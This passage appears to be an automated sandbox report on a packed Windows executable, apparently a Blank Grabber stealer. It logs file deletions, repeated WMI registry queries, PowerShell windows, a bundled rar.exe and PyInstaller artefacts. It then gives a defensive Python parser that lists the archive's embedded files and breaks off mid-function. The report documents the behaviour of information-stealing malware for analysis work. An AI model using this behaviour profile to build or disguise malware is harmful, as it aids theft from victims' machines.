              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2138960524.000001F12B1CB000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400386354.000001F12B1CD000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://yahoo.com/
              Source: unknown | Network traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49822
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File deleted: C:\Users\user\AppData\Local\Temp\??? ? ?\Common Files\Desktop\BJZFPPWAPT.docx
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File deleted: C:\Users\user\AppData\Local\Temp\??? ? ?\Common Files\Desktop\NVWZAPQSQL.xlsx
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File deleted: C:\Users\user\AppData\Local\Temp\??? ? ?\Common Files\Desktop\BJZFPPWAPT.png
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File deleted: C:\Users\user\AppData\Local\Temp\??? ? ?\Common Files\Desktop\NWCXBPIUYI.mp3
              Source: cmd.exe | Process created: 53

              System Summary

              barindex
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1A3A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1CB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA51000
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA769D4
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA58BD0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA69F10
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA75EEC
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA61DC4
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA65DA0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA63610
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA6E5E0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA5AD1D
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA718E4
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA59870
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA61FD0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA617B0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA79798
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA68804
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA6DF60
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA6DACC
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA621D4
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA619B4
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA63A14
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA68154
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA70938
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA7411C
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA5A4E4
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA76488
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA70938
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA62C80
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA73C80
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA75C70
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA61BC0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA5A34B
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF78DA51000
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF78DA769D4
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF78DA69F10
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF78DA75EEC
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A885EEC0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A88579D0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A87FFAB0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A87F7E90
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A88569C0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A884EAA0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A888AA30
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A8864A40
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A87F4B20
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A880ACF0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A87FAC00
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A8806C40
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A92EB360
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A92E1537
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A9340B30
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A92E6BA0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A92E168B
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A92E15B4
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A92E1BE0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF8A92E20B3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8475F1DCA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8476C3027
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 42_2_00007FF8475D205D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 42_2_00007FF8475D3EC5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 42_2_00007FF8475D3EB5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 42_2_00007FF8476A17D9
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA18ABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA190A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1B7B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1AAE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1954C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA191180
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1882F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA181884
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA18B540
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C4B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1D9B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA198C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C5C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1B0D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA18DD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1D6D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1A9D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1AD97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1849B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C69FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C5A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1BFA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1EAAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA18CB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1B5F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1EAF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1EDFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C4FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA193030
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1BC00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1AC05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1B0074
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1B8040
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1E00F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1A0104
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C9D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1D1DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA191E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA18EE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1DFE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA198E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1CAE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1CEEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA18CE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA189EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1BAF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA192360
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1B0374
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1AC3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1AD458
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C5468
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA18A504
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C2164
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C81CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1E41CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA19E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1D2268
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1A7244
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA18F24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C02A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1842E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA19D2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1D832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1D1314
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1A67E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1917C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1D18A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA188884
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA192890
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1B38E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1BD91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1B0904
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA198598
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1BF59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1AF5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1B65FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1D260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1D7660
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1986C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1E86D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C2700
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1BA710
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C0710
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: String function: 00007FF6AA1C49F4 appears 53 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: String function: 00007FF6AA198444 appears 48 times
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: String function: 00007FF8A92E12EE appears 144 times
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: String function: 00007FF78DA52710 appears 82 times
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: String function: 00007FF8A87E8450 appears 39 times
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: String function: 00007FF8A934DF9F appears 44 times
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: String function: 00007FF8A934E035 appears 34 times
              Source: 9g9LZNE4bH.exeStatic PE information: invalid certificate
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: 9g9LZNE4bH.exeBinary or memory string: OriginalFilename vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2029680452.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2027522576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000000.2024791081.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWerMgrj% vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2026438484.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2025472541.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2029990459.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2025338149.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2025057853.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2026254696.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2029516271.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2026342606.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2025951320.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2025197321.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2026037840.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2026161576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exeBinary or memory string: OriginalFilename vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2408936986.00007FF8B7E13000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2410749763.00007FF8B9F6C000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2410371024.00007FF8B93D8000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2409848881.00007FF8B8B4C000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2406234372.00007FF8A845B000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2408750040.00007FF8A9393000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2409129027.00007FF8B7E4D000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2408434798.00007FF8A8F2C000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython311.dll. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000000.2030556743.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWerMgrj% vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2409538341.00007FF8B8B12000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2410588457.00007FF8B984C000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2407250158.00007FF8A87B4000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2411111801.00007FF8BFAC7000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2410144947.00007FF8B8F92000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2409346784.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exeBinary or memory string: OriginalFilenameWerMgrj% vs 9g9LZNE4bH.exe
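The OriginalFilename mismatches above (python311.dll, _ssl.pyd, sqlite3.dll, libssl, libcrypto) and the _MEI61762 temp directory are what a PyInstaller one-file bootloader leaves behind when it unpacks its embedded CArchive at run time. The archive is appended to the bootloader PE as an overlay and ends with an 88-byte cookie; the table of contents lists every bundled file, so the helper binaries and the entry script can be pulled out without executing the sample. The parser below is an added example, not code from the report or from the Blank Grabber project. It follows PyInstaller's documented CArchive layout (cookie `!8sIIii64s`, TOC entries `!iIIIBc` followed by a NUL-padded name, offsets relative to the package start); the in-memory sample archive it builds, including the entry names and the dummy bootloader, is constructed here and is not the sample's real content.

```python
"""List the files embedded in a PyInstaller one-file executable (added example)."""
import struct
import zlib

MAGIC = b"MEI\014\013\012\013\016"          # PyInstaller CArchive cookie magic
COOKIE = struct.Struct("!8sIIii64s")        # magic, len_package, toc_offset, toc_len, pyvers, pylib_name
TOC_ENTRY = struct.Struct("!iIIIBc")        # entry_len, offset, compressed, uncompressed, zlib_flag, type_code
TYPE_CODES = {b"b": "binary", b"z": "pyz", b"m": "module", b"M": "package",
              b"s": "script", b"x": "data", b"o": "option", b"d": "dependency"}


def parse_archive(blob: bytes):
    """Return (python_version, pylib_name, [entries]) for a one-file executable image.

    The cookie is searched from the end, so trailing data after it (for example
    an Authenticode blob appended to the packed file) does not break the walk."""
    cookie_pos = blob.rfind(MAGIC)
    if cookie_pos < 0:
        raise ValueError("no PyInstaller cookie found")
    _magic, len_package, toc_offset, toc_len, pyvers, pylib = COOKIE.unpack_from(blob, cookie_pos)
    # len_package counts everything from the package start up to and including the cookie
    package_start = cookie_pos + COOKIE.size - len_package
    pos, end = package_start + toc_offset, package_start + toc_offset + toc_len
    entries = []
    while pos < end:
        entry_len, off, csize, usize, zflag, typ = TOC_ENTRY.unpack_from(blob, pos)
        name = blob[pos + TOC_ENTRY.size:pos + entry_len].rstrip(b"\0").decode("utf-8")
        raw = blob[package_start + off:package_start + off + csize]
        data = zlib.decompress(raw) if zflag else raw
        if len(data) != usize:
            raise ValueError(f"size mismatch for {name}")
        entries.append({"name": name, "type": TYPE_CODES.get(typ, typ.decode()),
                        "compressed": csize, "size": usize, "data": data})
        pos += entry_len
    # Current PyInstaller stores major*100+minor (311 == 3.11); very old builds used major*10+minor
    if pyvers >= 100:
        version = f"{pyvers // 100}.{pyvers % 100}"
    else:
        version = f"{pyvers // 10}.{pyvers % 10}"
    return version, pylib.rstrip(b"\0").decode(), entries


def build_sample_archive(bootloader: bytes) -> bytes:
    """Constructed one-file layout: bootloader PE + [files][TOC][cookie]. All contents are dummies."""
    files = [
        (b"rar.exe", b"b", b"MZ" + b"\0" * 200, False),               # bundled helper, stored raw
        (b"_ssl.pyd", b"b", b"MZ" + b"\x90" * 300, True),             # extension module, zlib-compressed
        (b"stub", b"s", b"import os\nprint('hello')\n" * 4, True),    # entry script, zlib-compressed
    ]
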